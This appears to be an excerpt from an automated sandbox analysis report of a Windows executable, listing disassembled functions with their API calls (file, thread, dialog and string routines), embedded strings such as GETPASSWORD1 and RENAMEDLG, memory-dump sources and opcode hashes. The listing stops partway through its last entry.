                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: 76791d9759e55aa8e4689130b65ba507a49a6f2d7db7a1400f9c6282461f6079
                                                            • Instruction ID: b3bfff0ebb1d08bf42f8b0016c08a4eabfbe65f49af232dfe033fbb8cc2fce71
                                                            • Opcode Fuzzy Hash: 76791d9759e55aa8e4689130b65ba507a49a6f2d7db7a1400f9c6282461f6079
                                                            • Instruction Fuzzy Hash: BE1151B1A547489FD3215F76DC84AABFBECEB69744F14487EF1DAC2200D7B159808B50
                                                            Function 00BEB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • EndDialog.USER32(?,00000001), ref: 00BEB2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00BEB2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 00BEB304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            • Opcode ID: 0307f829f4fce2729bcace890cf0ffbd4bd02ff203bcd2ae925430a5632abe31
                                                            • Instruction ID: 9c95fb82cc0e66b647854fa6d57b6ba26c00368dcdb8066ec21517356c362983
                                                            • Opcode Fuzzy Hash: 0307f829f4fce2729bcace890cf0ffbd4bd02ff203bcd2ae925430a5632abe31
                                                            • Instruction Fuzzy Hash: 08110432900159B7DF219A65AC8AFFF7BACEF09710F0000A1FB46B21C0D7A4DA4097A1
                                                            Function 00BEDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 8797dd318a1b3fdc6bfcde48ac583cd9d2d8426bbb2ae7945f751abec92958fe
                                                            • Instruction ID: 3b9c8e93a99ee5cccf409203e75ec5f2ba3cb5937a9f8c3540bf9be999378f3a
                                                            • Opcode Fuzzy Hash: 8797dd318a1b3fdc6bfcde48ac583cd9d2d8426bbb2ae7945f751abec92958fe
                                                            • Instruction Fuzzy Hash: C501B576508285EFDB118F96FC44B9E3BE5F709344B108475F905D3270CB708850DBA0
                                                            Function 00BF9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                            • Instruction ID: d93a00a8774eac78e9fb3cc1eb5cb6b9fe2eef07f4062582b9a516878bd01861
                                                            • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                            • Instruction Fuzzy Hash: 62A15A7290438E9FEB25CF28C8917BEBBE5EF55310F2441EDE6959B282C2358D49C750
                                                            Function 00BDA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00BD7F69,?,?,?), ref: 00BDA3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00BD7F69,?), ref: 00BDA43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00BD7F69,?,?,?,?,?,?,?), ref: 00BDA4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,00BD7F69,?,?,?,?,?,?,?,?,?,?), ref: 00BDA4C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: fa60a393bb77fbdb0396b3f42e51c554b8ff74d8bdd0cca77ad011c836ded668
                                                            • Instruction ID: 3564c93af1a888a608465ae1536acbb62c3586ec5a3962dadd00afd231d5f142
                                                            • Opcode Fuzzy Hash: fa60a393bb77fbdb0396b3f42e51c554b8ff74d8bdd0cca77ad011c836ded668
                                                            • Instruction Fuzzy Hash: E441CF31248381AAD731DF24DC45FAEFBE9AB85710F04099EB5E1932C0E6A49A48DB53
                                                            Function 00BD1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: dc6657493e90fe2136edfe3b8b751718e8aeb83ede6a7e006482db2fd88ad0fc
                                                            • Instruction ID: c0c17e9b2fe4407bcbb4cb9bee7e0e37e1a4329abb5114b234250e43d955758c
                                                            • Opcode Fuzzy Hash: dc6657493e90fe2136edfe3b8b751718e8aeb83ede6a7e006482db2fd88ad0fc
                                                            • Instruction Fuzzy Hash: 2741A97190066A5FCB25AF688C45AEFBBF8EF11710F00045AFD45F7245DB70AE498BA4
                                                            Function 00BFC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BF91E0,?,00000000,?,00000001,?,?,00000001,00BF91E0,?), ref: 00BFC9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BFCA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BF6CBE,?), ref: 00BFCA70
                                                            • __freea.LIBCMT ref: 00BFCA79
                                                              • Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: 6b2daf6ec1d0dc73669ee374c15e7312a045b9544d71c7326d86af1196c60b38
                                                            • Instruction ID: a8467814390ef4d1ce108a1c4acb7ea1de92d4ae3c46a7b16c32aa90dd9b4453
                                                            • Opcode Fuzzy Hash: 6b2daf6ec1d0dc73669ee374c15e7312a045b9544d71c7326d86af1196c60b38
                                                            • Instruction Fuzzy Hash: 8631AC72A0020EABDB25CF64CC41EBE7BE5EF41710B1541A8E904E7290E735DD98CB90
                                                            Function 00BEA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00BEA666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00BEA675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BEA683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00BEA691
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: d084b52a4c3e765289a5014dbbe7d408c3af1804f8dcee691f59280d39d5c4d5
                                                            • Instruction ID: abe2f9a272a3c64da9223fef385809ff974321b2670b3214d7242bc391fe9606
                                                            • Opcode Fuzzy Hash: d084b52a4c3e765289a5014dbbe7d408c3af1804f8dcee691f59280d39d5c4d5
                                                            • Instruction Fuzzy Hash: 1FE08C31966761ABC3241B60AC4DBCE3E58AB06B52F008100FB059A190DB6486048BA0
                                                            Function 00BEA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BEA699: GetDC.USER32(00000000), ref: 00BEA69D
                                                              • Part of subcall function 00BEA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BEA6A8
                                                              • Part of subcall function 00BEA699: ReleaseDC.USER32(00000000,00000000), ref: 00BEA6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00BEA83C
                                                              • Part of subcall function 00BEAAC9: GetDC.USER32(00000000), ref: 00BEAAD2
                                                              • Part of subcall function 00BEAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00BEAB01
                                                              • Part of subcall function 00BEAAC9: ReleaseDC.USER32(00000000,?), ref: 00BEAB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: 3c30538cfe5d384a6a531e0aba337dc330cf6fbe400e0d9b028952aca2dde3b8
                                                            • Instruction ID: 616de988dbe82ef96a3425f63c1c697d1535367ef4f48e052d016bf771a0c40d
                                                            • Opcode Fuzzy Hash: 3c30538cfe5d384a6a531e0aba337dc330cf6fbe400e0d9b028952aca2dde3b8
                                                            • Instruction Fuzzy Hash: 5491E171608394AFD610DF25D888A2BBBECFFC9700F00495EF59AD3261DB30A945CB62
                                                            Function 00BD75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD75E3
                                                              • Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0
                                                              • Part of subcall function 00BDA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BDA598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD777F
                                                              • Part of subcall function 00BDA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA501
                                                              • Part of subcall function 00BDA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: d4e98fe2175796d4ebf5150a5cdc4bfae1f565c593df8c9ffe4cda1c197e74bd
                                                            • Instruction ID: 96d08b08d01b27cdf373272ea1cc2940dd8b5b13edff9d259ca2961d99f3bdf8
                                                            • Opcode Fuzzy Hash: d4e98fe2175796d4ebf5150a5cdc4bfae1f565c593df8c9ffe4cda1c197e74bd
                                                            • Instruction Fuzzy Hash: 1D415171801158AAEB25EB64DC95EDEF7F8EF55300F0040E7A609A2292FB745F84CF61
                                                            Function 00BEB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: b48c530ccda4beed9dada973cbe0357e7b8e524134895576bf91b02cb2e1f82b
                                                            • Instruction ID: 9f765cfecaf0b19b283411315542e6123ad9f055830b3d1a94fe952c507c8481
                                                            • Opcode Fuzzy Hash: b48c530ccda4beed9dada973cbe0357e7b8e524134895576bf91b02cb2e1f82b
                                                            • Instruction Fuzzy Hash: 1921027290438A5AD731EA65D855E7FB3ECDFA1750F1404AAF640C3241EB65DE4C83B2
                                                            Function 00BDF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BDF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BDF2E4
                                                              • Part of subcall function 00BDF2C5: GetProcAddress.KERNEL32(00C181C8,CryptUnprotectMemory), ref: 00BDF2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00BDF33E), ref: 00BDF3D2
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 00BDF389
                                                            • CryptUnprotectMemory failed, xrefs: 00BDF3CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 7a45a32c68e995c121d372e7eff5090d7f2c161dc8321df561aafc7409f11f1e
                                                            • Instruction ID: 40af1255a9608e39f9a16c900178372607d939b949e9464c82b00d72cab3fbe2
                                                            • Opcode Fuzzy Hash: 7a45a32c68e995c121d372e7eff5090d7f2c161dc8321df561aafc7409f11f1e
                                                            • Instruction Fuzzy Hash: AB11363160D22AABDF155B20DC4577EB798FF01770B1681A7FC025B351EA309E018698
                                                            Function 00BDB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00BDB9B8
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            • Opcode ID: a13aa4db28c1d8db4b95bec343c04ae8c8ab31f450074f44d3b010adf1b4f036
                                                            • Instruction ID: 29677c4e3b73a5a3e0586e23eab0bc9839b97a017bf1858307223d43e02b0587
                                                            • Opcode Fuzzy Hash: a13aa4db28c1d8db4b95bec343c04ae8c8ab31f450074f44d3b010adf1b4f036
                                                            • Instruction Fuzzy Hash: 4601DE63500312A99A30AB758C82D7BE7ECEE957B0B55489BF644D7282FF24D84483B1
                                                            Function 00BE101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00010000,00BE1160,?,00000000,00000000), ref: 00BE1043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00BE108A
                                                              • Part of subcall function 00BD6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD6C54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            • Opcode ID: 2cd4c1ba85909c946b6fb911eac81465950aad4fd20b918ce80f42df541c10b4
                                                            • Instruction ID: ce9027efc85cc6055ea4c9cff009de47d401b72c1baf619f8cff104a98f30a59
                                                            • Opcode Fuzzy Hash: 2cd4c1ba85909c946b6fb911eac81465950aad4fd20b918ce80f42df541c10b4
                                                            • Instruction Fuzzy Hash: A50149B5344389AFD3346F29AC51BBAB3D8EB85351F30046EFA8652281DBB068C48330
                                                            Function 00BD1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BDE2E8: _swprintf.LIBCMT ref: 00BDE30E
                                                              • Part of subcall function 00BDE2E8: _strlen.LIBCMT ref: 00BDE32F
                                                              • Part of subcall function 00BDE2E8: SetDlgItemTextW.USER32(?,00C0E274,?), ref: 00BDE38F
                                                              • Part of subcall function 00BDE2E8: GetWindowRect.USER32(?,?), ref: 00BDE3C9
                                                              • Part of subcall function 00BDE2E8: GetClientRect.USER32(?,?), ref: 00BDE3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                            • SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: 7348ed69b1cc7ab6e7b0af2c33bdb6847387394874ddbad971466782059562e4
                                                            • Instruction ID: 346944d8caab5a9d1e1db15c5d0df45127f6b0f4217260694111fd25a6a6bfd0
                                                            • Opcode Fuzzy Hash: 7348ed69b1cc7ab6e7b0af2c33bdb6847387394874ddbad971466782059562e4
